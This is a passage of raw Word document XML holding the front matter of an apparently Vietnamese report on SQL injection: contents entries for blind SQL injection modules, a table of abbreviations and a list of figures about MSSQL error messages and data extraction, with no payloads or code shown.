            <w:r w:rsidR="0018283E" w:rsidRPr="0018283E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Module Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822529 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</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30" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="0018283E" w:rsidRPr="0018283E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Module Blind SQL injection sử dụng tìm kiếm nhị phân</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822530 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</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31" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="0018283E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Module Blind SQL injection sử dụng phép dịch bit</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822531 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005447AB" w:rsidRDefault="001E10B4" w:rsidP="008E1FF3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9395"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8931"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc459822532" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="0018283E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Module Blind SQL injection sử dụng Order by</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822532 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00410F30" w:rsidRDefault="00B70950" w:rsidP="008E1FF3">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8931"/>
            </w:tabs>
            <w:jc w:val="left"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00410F30" w:rsidRPr="00410F30" w:rsidRDefault="00410F30" w:rsidP="00410F30">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C37E54" w:rsidRPr="003E0ED1" w:rsidRDefault="003E0ED1" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_Toc459822480"/>
      <w:r w:rsidR="00C37E54">
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC TỪ VIẾT TẮT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="713"/>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="5860"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C37E54" w:rsidRPr="002B0849" w:rsidTr="00194A77">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C37E54" w:rsidRPr="002B0849" w:rsidRDefault="00C37E54" w:rsidP="00B82BEB">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br w:type="page"/>
              <w:t>STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C37E54" w:rsidRPr="002B0849" w:rsidRDefault="00C37E54" w:rsidP="00B82BEB">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t>Từ viết tắt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5860" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C37E54" w:rsidRPr="002B0849" w:rsidRDefault="00C37E54" w:rsidP="00B82BEB">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t>Giải nghĩa</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API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5860"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Application Programming Interfac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S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ctive Server Pag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TTT</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n toàn thông tin</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M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ntent Management System</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SD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ơ sở dữ liệu</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VE</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mmon Vulnerabilities and Exposures</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WE</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mmon Weakness Enumeration</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DBM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Data Base Management System</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DDD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5860" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C37E54" w:rsidRPr="002B0849" w:rsidRDefault="00C37E54" w:rsidP="00B82BEB">
            <w:pPr>
              <w:suppressAutoHyphens w:val="0"/>
              <w:spacing w:line="252" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B0849">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Domain Driven Design</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sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>DD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sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Domain Driven Security</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M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Markup Languag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T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Transfer Protocol</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TPS</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Transfer Protocol Secur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JS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Java Server Pages</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LTV</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Lập trình viên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C6B6B" w:rsidRPr="002B0849" w:rsidTr="00194A77">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007C6B6B" w:rsidRPr="004D66E3" w:rsidRDefault="007C6B6B"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7C6B6B" w:rsidRPr="002B0849" w:rsidRDefault="007C6B6B" w:rsidP="00B82BEB">
            <w:pPr>
              <w:suppressAutoHyphens w:val="0"/>
              <w:spacing w:line="252" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>MSSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5860" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007C6B6B" w:rsidRPr="002B0849" w:rsidRDefault="007C6B6B" w:rsidP="007C6B6B">
            <w:pPr>
              <w:suppressAutoHyphens w:val="0"/>
              <w:spacing w:line="252" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Hệ quản trị CSDL </w:t>
            </w:r>
            <w:r w:rsidRPr="007C6B6B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Microsoft SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C6B6B" w:rsidRPr="002B0849" w:rsidTr="00194A77">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007C6B6B" w:rsidRPr="004D66E3" w:rsidRDefault="007C6B6B"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7C6B6B" w:rsidRPr="002B0849" w:rsidRDefault="007C6B6B" w:rsidP="00B82BEB">
            <w:pPr>
              <w:suppressAutoHyphens w:val="0"/>
              <w:spacing w:line="252" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5860" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007C6B6B" w:rsidRPr="002B0849" w:rsidRDefault="007C6B6B" w:rsidP="007C6B6B">
            <w:pPr>
              <w:suppressAutoHyphens w:val="0"/>
              <w:spacing w:line="252" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Hệ quản trị CSDL My</w:t>
            </w:r>
            <w:r w:rsidRPr="007C6B6B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>SQL</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OWAS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Open Web Application Security Project</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PHP</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PHP: Hypertext Preprocessor</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SQ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Structured Query Language</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 RI</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niform Resource Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C37E54" w:rsidRPr="002B0849" w:rsidTr="00194A77">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C37E54" w:rsidRPr="004D66E3" w:rsidRDefault="00C37E54" w:rsidP="00B82BEB">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:suppressAutoHyphens w:val="0"/>
              <w:spacing w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358"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 RL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5860" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C37E54" w:rsidRPr="002B0849" w:rsidRDefault="00C37E54" w:rsidP="00B82BEB">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niform Resource Locator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C37E54" w:rsidRDefault="00C37E54" w:rsidP="00C37E54">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0ED1" w:rsidRPr="00FF76BB" w:rsidRDefault="00EE5E6C" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc459822481"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC HÌNH VẼ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00E14CFD" w:rsidRDefault="003308DA" w:rsidP="00E14CFD">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Hình" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc459819428" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.1: Mô hình ba lớp đơn giản trong ứng dụng web.</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819428 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</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29" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.2:Mô hình ứng dụng 4-lớp.</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819429 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</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0" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.3: Thông báo lỗi của MSSQL Server</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819430 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</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1" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.4: Lấy thông tin phiên bản MSSQL Server</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819431 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</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2" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.5: Lấy thông tin về tên CSDL</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819432 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</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3" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.6: Lấy thông tin về tên bảng</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819433 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</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4" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.7: Kết quả trả về của mệnh đề UNION.</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819434 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</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5" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.8: Kết quả ghép nối dữ liệu</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
